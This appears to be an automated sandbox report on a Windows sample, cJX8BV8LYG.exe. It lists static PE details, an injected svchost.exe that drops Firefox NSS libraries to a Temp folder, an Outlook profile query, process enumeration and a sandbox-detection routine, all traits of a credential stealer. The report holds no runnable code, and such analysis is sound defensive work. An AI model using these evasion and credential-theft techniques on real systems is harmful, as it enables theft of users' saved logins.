            Source: C:\Windows\SysWOW64\svchost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
            Source: cJX8BV8LYG.exe | Static file information: File size 1320960 > 1048576
            Source: cJX8BV8LYG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: cJX8BV8LYG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: cJX8BV8LYG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: cJX8BV8LYG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: cJX8BV8LYG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: cJX8BV8LYG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr
            Source: Binary string: ucrtbase.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
            Source: Binary string: wntdll.pdb source: cJX8BV8LYG.exe, 00000000.00000003.1704325941.0000000003960000.00000004.00001000.00020000.00000000.sdmp, cJX8BV8LYG.exe, 00000000.00000003.1705553215.0000000003B00000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdbGCTL source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.1.dr
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
            Source: Binary string: msvcp140.i386.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.1.dr
            Source: Binary string: ucrtbase.pdbUGP source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
            Source: Binary string: wntdll.pdbUGP source: cJX8BV8LYG.exe, 00000000.00000003.1704325941.0000000003960000.00000004.00001000.00020000.00000000.sdmp, cJX8BV8LYG.exe, 00000000.00000003.1705553215.0000000003B00000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.1.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
            Source: Binary string: msvcp140.i386.pdbGCTL source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr
            Source: cJX8BV8LYG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: cJX8BV8LYG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: cJX8BV8LYG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: cJX8BV8LYG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: cJX8BV8LYG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: ucrtbase.dll.1.dr | Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007842DE
            Source: msvcp140.dll.1.dr | Static PE information: section name: .didat
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-localization-l1-2-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-math-l1-1-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-runtime-l1-1-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-libraryloader-l1-1-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-conio-l1-1-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-datetime-l1-1-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-memory-l1-1-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\softokn3.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-profile-l1-1-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l2-1-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-namedpipe-l1-1-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-heap-l1-1-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-2-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-1.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-string-l1-1-0.dll
            Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-console-l1-1-0.dll
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\ucrtbase.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\mozglue.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\vcruntime140.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\nss3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\freebl3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\nssdbm3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\msvcp140.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_0079F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0079F98E
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_00811C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00811C41
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_00417B1A
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_0-97654
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe API/Special instruction interceptor: Address: 1E43214
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,GetCurrentProcessId,1_2_00416B94
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\softokn3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\nss3.dllJump to dropped file
